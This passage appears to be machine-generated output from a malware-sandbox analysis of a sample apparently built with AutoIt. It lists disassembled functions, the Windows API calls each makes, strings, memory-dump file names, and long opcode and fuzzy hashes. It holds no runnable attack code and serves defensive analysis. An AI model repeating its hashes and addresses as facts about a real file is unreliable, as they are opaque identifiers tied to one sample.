                    • Instruction ID: 9f393298045b5f7c02e32a73093de2e354f4ea87b96b1796fe7d10163ec416fe
                    • Opcode Fuzzy Hash: 14eaea81888fc83a3747d1a6e115ab3d66b35e7ca3710d127aed6accd8240c6f
                    • Instruction Fuzzy Hash: 4711E0B0201225BADB288F519C98FFBFF68FB06361F10816EF90542041D2786A62DAE0
                    Function 007C80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007C830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007C80C8,?,00000000,?,?), ref: 007C8322
                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007C80CB
                    • htons.WSOCK32(00000000,?,00000000), ref: 007C8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: 05aada6adccc7e7cbd85d7d9c1b7d374164d331864d67723836a9fa1ca5bf660
                    • Instruction ID: 1eb61b15e104da7bab7c1f5038f9e3882fec188ec0596107514ed416f1c38c58
                    • Opcode Fuzzy Hash: 05aada6adccc7e7cbd85d7d9c1b7d374164d331864d67723836a9fa1ca5bf660
                    • Instruction Fuzzy Hash: 2911E534600209ABCB10AFA4CC86FEDB774FF05320F14852FE91197291DB75A805C796
                    Function 007A92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007A9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: f2aeb9cd26b4020416258cc3965e93608ddf5655254c6fb205dab61d7fdb317c
                    • Instruction ID: f2d5b7a0b4b13ddb522954e5244a4589ef25c2ae7f9cf568e5284a9aa477c95e
                    • Opcode Fuzzy Hash: f2aeb9cd26b4020416258cc3965e93608ddf5655254c6fb205dab61d7fdb317c
                    • Instruction Fuzzy Hash: 8F01CC71A01214ABCF08EBA0CC968FE7769BB86320B100719FA72972D2DA29581C8650
                    Function 007A91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 007A924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 685249a4b52f4d6acf26947c8ab268d8745987356a088afc9377590ea5a78b3c
                    • Instruction ID: 58d8c7f50cf5723afc1990bc8461a6ae3a0bb8d3efe02f31169165cfe4c40560
                    • Opcode Fuzzy Hash: 685249a4b52f4d6acf26947c8ab268d8745987356a088afc9377590ea5a78b3c
                    • Instruction Fuzzy Hash: DE018471E41104BBCB18EBA0CD96EFF77A8EF86300F140219B912672D2EA5D5E1C9661
                    Function 007A9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                      • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 007A92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                    • Instruction ID: 4867b89c836f9d2bd0abd6bed38d714f2f675b09a5b999a9e9db5389d33658b4
                    • Opcode Fuzzy Hash: 7486a9b618f3f9da0088b00329129b29d958a05e36d5994e0d60debd25fe07da
                    • Instruction Fuzzy Hash: 7501A271E41108B7CB04EAA0CD96EFF77ACAF52301F244215B912A32D2DA695E1C9271
                    Function 007B51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                    • Instruction ID: f4bf998b72775070663e485973eb7fb81fb11f425a0301d426978af4ae87ffa4
                    • Opcode Fuzzy Hash: d1a53eff19a3a7ac5c333880e7f275643f7292e90ccc1e88faf7126a135b17b8
                    • Instruction Fuzzy Hash: 32E02272A013282AE720AAA9AC49BE7FBACFB40771F00006BFD14D3040E5749A448BE0
                    Function 007A81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                    Download Yara Rule
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007A81CA
                      • Part of subcall function 00773598: _doexit.LIBCMT ref: 007735A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 979f202250a49cc1706c396fb0be5785c02b548dc0e031becd7151865820169e
                    • Instruction ID: 131193799971421e00805ecc27a335b4509cf0378d717a28d7f278d286da99f7
                    • Opcode Fuzzy Hash: 979f202250a49cc1706c396fb0be5785c02b548dc0e031becd7151865820169e
                    • Instruction Fuzzy Hash: 66D0123238535872D65432A96C0BBC56A484B05B56F508016FB0C955D389DE999152ED
                    Function 0078B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0078B564: _memset.LIBCMT ref: 0078B571
                      • Part of subcall function 00770B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0078B540,?,?,?,0075100A), ref: 00770B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,0075100A), ref: 0078B544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0075100A), ref: 0078B553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0078B54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                    • Instruction ID: c371e23d9fd8f2faefc858c0e06646e575cce4450d35a536a75e850f26264fbe
                    • Opcode Fuzzy Hash: 6e3bc9a06f1490edc3266605d9b03c39f223db690ac5b1855f3accfa9d92d60a
                    • Instruction Fuzzy Hash: 2BE039B06003118BD720EF28E8083427BE4AB04755F04C92DE886C26A1E7BCE408CBA1
                    Function 007D5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                    Download Yara Rule
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D5BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D5C08
                      • Part of subcall function 007B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                    • Instruction ID: a5e2a6f959efa799113e5c0697b287dd69f0f39e0319f28d92de14159d704a66
                    • Opcode Fuzzy Hash: 091ea8cd9d51376169fc494ea4bc736856468463f69c29c44f728a56f031bf9f
                    • Instruction Fuzzy Hash: 95D0C935389311B6E768AB70AC0FFD76B24AB00B51F044826F657AA1D0D9E89801C654